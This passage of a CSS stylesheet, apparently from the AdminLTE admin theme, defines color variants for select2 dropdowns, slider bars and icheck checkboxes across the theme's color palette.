.select2-blue .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #0074f0;
color: #ffffff;
}
.select2-container--default .select2-blue .select2-selection--multiple:focus,
.select2-blue .select2-container--default .select2-selection--multiple:focus {
border-color: #80bdff;
}
.select2-container--default .select2-blue .select2-selection--multiple .select2-selection__choice,
.select2-blue .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #007bff;
border-color: #006fe6;
color: #ffffff;
}
.select2-container--default .select2-blue .select2-selection--multiple .select2-selection__choice__remove,
.select2-blue .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-blue .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-blue .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-blue.select2-container--focus .select2-selection--multiple,
.select2-blue .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #80bdff;
}
.select2-indigo + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #b389f9;
}
.select2-indigo + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #b389f9;
}
.select2-container--default .select2-indigo.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-indigo .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-indigo .select2-search--inline .select2-search__field:focus,
.select2-indigo .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-indigo .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-indigo .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #b389f9;
}
.select2-container--default .select2-indigo .select2-results__option--highlighted,
.select2-indigo .select2-container--default .select2-results__option--highlighted {
background-color: #6610f2;
color: #ffffff;
}
.select2-container--default .select2-indigo .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-indigo .select2-results__option--highlighted[aria-selected]:hover,
.select2-indigo .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-indigo .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #5f0de6;
color: #ffffff;
}
.select2-container--default .select2-indigo .select2-selection--multiple:focus,
.select2-indigo .select2-container--default .select2-selection--multiple:focus {
border-color: #b389f9;
}
.select2-container--default .select2-indigo .select2-selection--multiple .select2-selection__choice,
.select2-indigo .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #6610f2;
border-color: #5b0cdd;
color: #ffffff;
}
.select2-container--default .select2-indigo .select2-selection--multiple .select2-selection__choice__remove,
.select2-indigo .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-indigo .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-indigo .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-indigo.select2-container--focus .select2-selection--multiple,
.select2-indigo .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #b389f9;
}
.select2-purple + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #b8a2e0;
}
.select2-purple + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #b8a2e0;
}
.select2-container--default .select2-purple.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-purple .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-purple .select2-search--inline .select2-search__field:focus,
.select2-purple .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-purple .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-purple .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #b8a2e0;
}
.select2-container--default .select2-purple .select2-results__option--highlighted,
.select2-purple .select2-container--default .select2-results__option--highlighted {
background-color: #6f42c1;
color: #ffffff;
}
.select2-container--default .select2-purple .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-purple .select2-results__option--highlighted[aria-selected]:hover,
.select2-purple .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-purple .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #683cb8;
color: #ffffff;
}
.select2-container--default .select2-purple .select2-selection--multiple:focus,
.select2-purple .select2-container--default .select2-selection--multiple:focus {
border-color: #b8a2e0;
}
.select2-container--default .select2-purple .select2-selection--multiple .select2-selection__choice,
.select2-purple .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #6f42c1;
border-color: #643ab0;
color: #ffffff;
}
.select2-container--default .select2-purple .select2-selection--multiple .select2-selection__choice__remove,
.select2-purple .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-purple .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-purple .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-purple.select2-container--focus .select2-selection--multiple,
.select2-purple .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #b8a2e0;
}
.select2-pink + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #f6b0d0;
}
.select2-pink + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #f6b0d0;
}
.select2-container--default .select2-pink.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-pink .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-pink .select2-search--inline .select2-search__field:focus,
.select2-pink .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-pink .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-pink .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #f6b0d0;
}
.select2-container--default .select2-pink .select2-results__option--highlighted,
.select2-pink .select2-container--default .select2-results__option--highlighted {
background-color: #e83e8c;
color: #ffffff;
}
.select2-container--default .select2-pink .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-pink .select2-results__option--highlighted[aria-selected]:hover,
.select2-pink .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-pink .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #e63084;
color: #ffffff;
}
.select2-container--default .select2-pink .select2-selection--multiple:focus,
.select2-pink .select2-container--default .select2-selection--multiple:focus {
border-color: #f6b0d0;
}
.select2-container--default .select2-pink .select2-selection--multiple .select2-selection__choice,
.select2-pink .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #e83e8c;
border-color: #e5277e;
color: #ffffff;
}
.select2-container--default .select2-pink .select2-selection--multiple .select2-selection__choice__remove,
.select2-pink .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-pink .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-pink .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-pink.select2-container--focus .select2-selection--multiple,
.select2-pink .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #f6b0d0;
}
.select2-red + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #efa2a9;
}
.select2-red + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #efa2a9;
}
.select2-container--default .select2-red.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-red .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-red .select2-search--inline .select2-search__field:focus,
.select2-red .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-red .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-red .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #efa2a9;
}
.select2-container--default .select2-red .select2-results__option--highlighted,
.select2-red .select2-container--default .select2-results__option--highlighted {
background-color: #dc3545;
color: #ffffff;
}
.select2-container--default .select2-red .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-red .select2-results__option--highlighted[aria-selected]:hover,
.select2-red .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-red .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #da2839;
color: #ffffff;
}
.select2-container--default .select2-red .select2-selection--multiple:focus,
.select2-red .select2-container--default .select2-selection--multiple:focus {
border-color: #efa2a9;
}
.select2-container--default .select2-red .select2-selection--multiple .select2-selection__choice,
.select2-red .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #dc3545;
border-color: #d32535;
color: #ffffff;
}
.select2-container--default .select2-red .select2-selection--multiple .select2-selection__choice__remove,
.select2-red .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-red .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-red .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-red.select2-container--focus .select2-selection--multiple,
.select2-red .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #efa2a9;
}
.select2-orange + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #fec392;
}
.select2-orange + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #fec392;
}
.select2-container--default .select2-orange.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-orange .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-orange .select2-search--inline .select2-search__field:focus,
.select2-orange .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-orange .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-orange .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #fec392;
}
.select2-container--default .select2-orange .select2-results__option--highlighted,
.select2-orange .select2-container--default .select2-results__option--highlighted {
background-color: #fd7e14;
color: #1F2D3D;
}
.select2-container--default .select2-orange .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-orange .select2-results__option--highlighted[aria-selected]:hover,
.select2-orange .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-orange .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #fd7605;
color: #ffffff;
}
.select2-container--default .select2-orange .select2-selection--multiple:focus,
.select2-orange .select2-container--default .select2-selection--multiple:focus {
border-color: #fec392;
}
.select2-container--default .select2-orange .select2-selection--multiple .select2-selection__choice,
.select2-orange .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #fd7e14;
border-color: #f57102;
color: #1F2D3D;
}
.select2-container--default .select2-orange .select2-selection--multiple .select2-selection__choice__remove,
.select2-orange .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(31, 45, 61, 0.7);
}
.select2-container--default .select2-orange .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-orange .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #1F2D3D;
}
.select2-container--default .select2-orange.select2-container--focus .select2-selection--multiple,
.select2-orange .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #fec392;
}
.select2-yellow + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #ffe187;
}
.select2-yellow + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #ffe187;
}
.select2-container--default .select2-yellow.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-yellow .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-yellow .select2-search--inline .select2-search__field:focus,
.select2-yellow .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-yellow .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-yellow .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #ffe187;
}
.select2-container--default .select2-yellow .select2-results__option--highlighted,
.select2-yellow .select2-container--default .select2-results__option--highlighted {
background-color: #ffc107;
color: #1F2D3D;
}
.select2-container--default .select2-yellow .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-yellow .select2-results__option--highlighted[aria-selected]:hover,
.select2-yellow .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-yellow .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #f7b900;
color: #1F2D3D;
}
.select2-container--default .select2-yellow .select2-selection--multiple:focus,
.select2-yellow .select2-container--default .select2-selection--multiple:focus {
border-color: #ffe187;
}
.select2-container--default .select2-yellow .select2-selection--multiple .select2-selection__choice,
.select2-yellow .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #ffc107;
border-color: #edb100;
color: #1F2D3D;
}
.select2-container--default .select2-yellow .select2-selection--multiple .select2-selection__choice__remove,
.select2-yellow .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(31, 45, 61, 0.7);
}
.select2-container--default .select2-yellow .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-yellow .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #1F2D3D;
}
.select2-container--default .select2-yellow.select2-container--focus .select2-selection--multiple,
.select2-yellow .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #ffe187;
}
.select2-green + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #71dd8a;
}
.select2-green + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #71dd8a;
}
.select2-container--default .select2-green.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-green .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-green .select2-search--inline .select2-search__field:focus,
.select2-green .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-green .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-green .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #71dd8a;
}
.select2-container--default .select2-green .select2-results__option--highlighted,
.select2-green .select2-container--default .select2-results__option--highlighted {
background-color: #28a745;
color: #ffffff;
}
.select2-container--default .select2-green .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-green .select2-results__option--highlighted[aria-selected]:hover,
.select2-green .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-green .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #259b40;
color: #ffffff;
}
.select2-container--default .select2-green .select2-selection--multiple:focus,
.select2-green .select2-container--default .select2-selection--multiple:focus {
border-color: #71dd8a;
}
.select2-container--default .select2-green .select2-selection--multiple .select2-selection__choice,
.select2-green .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #28a745;
border-color: #23923d;
color: #ffffff;
}
.select2-container--default .select2-green .select2-selection--multiple .select2-selection__choice__remove,
.select2-green .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-green .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-green .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-green.select2-container--focus .select2-selection--multiple,
.select2-green .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #71dd8a;
}
.select2-teal + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #7eeaca;
}
.select2-teal + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #7eeaca;
}
.select2-container--default .select2-teal.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-teal .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-teal .select2-search--inline .select2-search__field:focus,
.select2-teal .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-teal .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-teal .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #7eeaca;
}
.select2-container--default .select2-teal .select2-results__option--highlighted,
.select2-teal .select2-container--default .select2-results__option--highlighted {
background-color: #20c997;
color: #ffffff;
}
.select2-container--default .select2-teal .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-teal .select2-results__option--highlighted[aria-selected]:hover,
.select2-teal .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-teal .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #1ebc8d;
color: #ffffff;
}
.select2-container--default .select2-teal .select2-selection--multiple:focus,
.select2-teal .select2-container--default .select2-selection--multiple:focus {
border-color: #7eeaca;
}
.select2-container--default .select2-teal .select2-selection--multiple .select2-selection__choice,
.select2-teal .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #20c997;
border-color: #1cb386;
color: #ffffff;
}
.select2-container--default .select2-teal .select2-selection--multiple .select2-selection__choice__remove,
.select2-teal .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-teal .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-teal .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-teal.select2-container--focus .select2-selection--multiple,
.select2-teal .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #7eeaca;
}
.select2-cyan + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #63d9ec;
}
.select2-cyan + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #63d9ec;
}
.select2-container--default .select2-cyan.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-cyan .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-cyan .select2-search--inline .select2-search__field:focus,
.select2-cyan .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-cyan .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-cyan .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #63d9ec;
}
.select2-container--default .select2-cyan .select2-results__option--highlighted,
.select2-cyan .select2-container--default .select2-results__option--highlighted {
background-color: #17a2b8;
color: #ffffff;
}
.select2-container--default .select2-cyan .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-cyan .select2-results__option--highlighted[aria-selected]:hover,
.select2-cyan .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-cyan .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #1596aa;
color: #ffffff;
}
.select2-container--default .select2-cyan .select2-selection--multiple:focus,
.select2-cyan .select2-container--default .select2-selection--multiple:focus {
border-color: #63d9ec;
}
.select2-container--default .select2-cyan .select2-selection--multiple .select2-selection__choice,
.select2-cyan .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #17a2b8;
border-color: #148ea1;
color: #ffffff;
}
.select2-container--default .select2-cyan .select2-selection--multiple .select2-selection__choice__remove,
.select2-cyan .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-cyan .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-cyan .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-cyan.select2-container--focus .select2-selection--multiple,
.select2-cyan .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #63d9ec;
}
.select2-white + .select2-container--default.select2-container--open .select2-selection--single {
border-color: white;
}
.select2-white + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: white;
}
.select2-container--default .select2-white.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-white .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-white .select2-search--inline .select2-search__field:focus,
.select2-white .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-white .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-white .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid white;
}
.select2-container--default .select2-white .select2-results__option--highlighted,
.select2-white .select2-container--default .select2-results__option--highlighted {
background-color: #ffffff;
color: #1F2D3D;
}
.select2-container--default .select2-white .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-white .select2-results__option--highlighted[aria-selected]:hover,
.select2-white .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-white .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #f7f7f7;
color: #1F2D3D;
}
.select2-container--default .select2-white .select2-selection--multiple:focus,
.select2-white .select2-container--default .select2-selection--multiple:focus {
border-color: white;
}
.select2-container--default .select2-white .select2-selection--multiple .select2-selection__choice,
.select2-white .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #ffffff;
border-color: #f2f2f2;
color: #1F2D3D;
}
.select2-container--default .select2-white .select2-selection--multiple .select2-selection__choice__remove,
.select2-white .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(31, 45, 61, 0.7);
}
.select2-container--default .select2-white .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-white .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #1F2D3D;
}
.select2-container--default .select2-white.select2-container--focus .select2-selection--multiple,
.select2-white .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: white;
}
.select2-gray + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #afb5ba;
}
.select2-gray + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #afb5ba;
}
.select2-container--default .select2-gray.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-gray .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-gray .select2-search--inline .select2-search__field:focus,
.select2-gray .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-gray .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-gray .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #afb5ba;
}
.select2-container--default .select2-gray .select2-results__option--highlighted,
.select2-gray .select2-container--default .select2-results__option--highlighted {
background-color: #6c757d;
color: #ffffff;
}
.select2-container--default .select2-gray .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-gray .select2-results__option--highlighted[aria-selected]:hover,
.select2-gray .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-gray .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #656d75;
color: #ffffff;
}
.select2-container--default .select2-gray .select2-selection--multiple:focus,
.select2-gray .select2-container--default .select2-selection--multiple:focus {
border-color: #afb5ba;
}
.select2-container--default .select2-gray .select2-selection--multiple .select2-selection__choice,
.select2-gray .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #6c757d;
border-color: #60686f;
color: #ffffff;
}
.select2-container--default .select2-gray .select2-selection--multiple .select2-selection__choice__remove,
.select2-gray .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-gray .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-gray .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-gray.select2-container--focus .select2-selection--multiple,
.select2-gray .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #afb5ba;
}
.select2-gray-dark + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #6d7a86;
}
.select2-gray-dark + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #6d7a86;
}
.select2-container--default .select2-gray-dark.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-gray-dark .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-gray-dark .select2-search--inline .select2-search__field:focus,
.select2-gray-dark .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-gray-dark .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-gray-dark .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #6d7a86;
}
.select2-container--default .select2-gray-dark .select2-results__option--highlighted,
.select2-gray-dark .select2-container--default .select2-results__option--highlighted {
background-color: #343a40;
color: #ffffff;
}
.select2-container--default .select2-gray-dark .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-gray-dark .select2-results__option--highlighted[aria-selected]:hover,
.select2-gray-dark .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-gray-dark .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #2d3238;
color: #ffffff;
}
.select2-container--default .select2-gray-dark .select2-selection--multiple:focus,
.select2-gray-dark .select2-container--default .select2-selection--multiple:focus {
border-color: #6d7a86;
}
.select2-container--default .select2-gray-dark .select2-selection--multiple .select2-selection__choice,
.select2-gray-dark .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #343a40;
border-color: #292d32;
color: #ffffff;
}
.select2-container--default .select2-gray-dark .select2-selection--multiple .select2-selection__choice__remove,
.select2-gray-dark .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-gray-dark .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-gray-dark .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-gray-dark.select2-container--focus .select2-selection--multiple,
.select2-gray-dark .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #6d7a86;
}
.slider .tooltip.in {
opacity: 0.9;
}
.slider.slider-vertical {
height: 100%;
}
.slider.slider-horizontal {
width: 100%;
}
.slider-primary .slider .slider-selection {
background: #007bff;
}
.slider-secondary .slider .slider-selection {
background: #6c757d;
}
.slider-success .slider .slider-selection {
background: #28a745;
}
.slider-info .slider .slider-selection {
background: #17a2b8;
}
.slider-warning .slider .slider-selection {
background: #ffc107;
}
.slider-danger .slider .slider-selection {
background: #dc3545;
}
.slider-light .slider .slider-selection {
background: #f8f9fa;
}
.slider-dark .slider .slider-selection {
background: #343a40;
}
.slider-lightblue .slider .slider-selection {
background: #3c8dbc;
}
.slider-navy .slider .slider-selection {
background: #001f3f;
}
.slider-olive .slider .slider-selection {
background: #3d9970;
}
.slider-lime .slider .slider-selection {
background: #01ff70;
}
.slider-fuchsia .slider .slider-selection {
background: #f012be;
}
.slider-maroon .slider .slider-selection {
background: #d81b60;
}
.slider-blue .slider .slider-selection {
background: #007bff;
}
.slider-indigo .slider .slider-selection {
background: #6610f2;
}
.slider-purple .slider .slider-selection {
background: #6f42c1;
}
.slider-pink .slider .slider-selection {
background: #e83e8c;
}
.slider-red .slider .slider-selection {
background: #dc3545;
}
.slider-orange .slider .slider-selection {
background: #fd7e14;
}
.slider-yellow .slider .slider-selection {
background: #ffc107;
}
.slider-green .slider .slider-selection {
background: #28a745;
}
.slider-teal .slider .slider-selection {
background: #20c997;
}
.slider-cyan .slider .slider-selection {
background: #17a2b8;
}
.slider-white .slider .slider-selection {
background: #ffffff;
}
.slider-gray .slider .slider-selection {
background: #6c757d;
}
.slider-gray-dark .slider .slider-selection {
background: #343a40;
}
.icheck-primary > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-primary > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #007bff;
}
.icheck-primary > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-primary > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #007bff;
}
.icheck-primary > input:first-child:checked + label::before,
.icheck-primary > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #007bff;
border-color: #007bff;
}
.icheck-secondary > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-secondary > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #6c757d;
}
.icheck-secondary > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-secondary > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #6c757d;
}
.icheck-secondary > input:first-child:checked + label::before,
.icheck-secondary > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #6c757d;
border-color: #6c757d;
}
.icheck-success > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-success > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #28a745;
}
.icheck-success > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-success > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #28a745;
}
.icheck-success > input:first-child:checked + label::before,
.icheck-success > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #28a745;
border-color: #28a745;
}
.icheck-info > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-info > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #17a2b8;
}
.icheck-info > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-info > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #17a2b8;
}
.icheck-info > input:first-child:checked + label::before,
.icheck-info > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #17a2b8;
border-color: #17a2b8;
}
.icheck-warning > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-warning > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #ffc107;
}
.icheck-warning > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-warning > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #ffc107;
}
.icheck-warning > input:first-child:checked + label::before,
.icheck-warning > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #ffc107;
border-color: #ffc107;
}
.icheck-danger > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-danger > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #dc3545;
}
.icheck-danger > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-danger > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #dc3545;
}
.icheck-danger > input:first-child:checked + label::before,
.icheck-danger > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #dc3545;
border-color: #dc3545;
}
.icheck-light > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-light > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #f8f9fa;
}
.icheck-light > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-light > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #f8f9fa;
}
.icheck-light > input:first-child:checked + label::before,
.icheck-light > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #f8f9fa;
border-color: #f8f9fa;
}
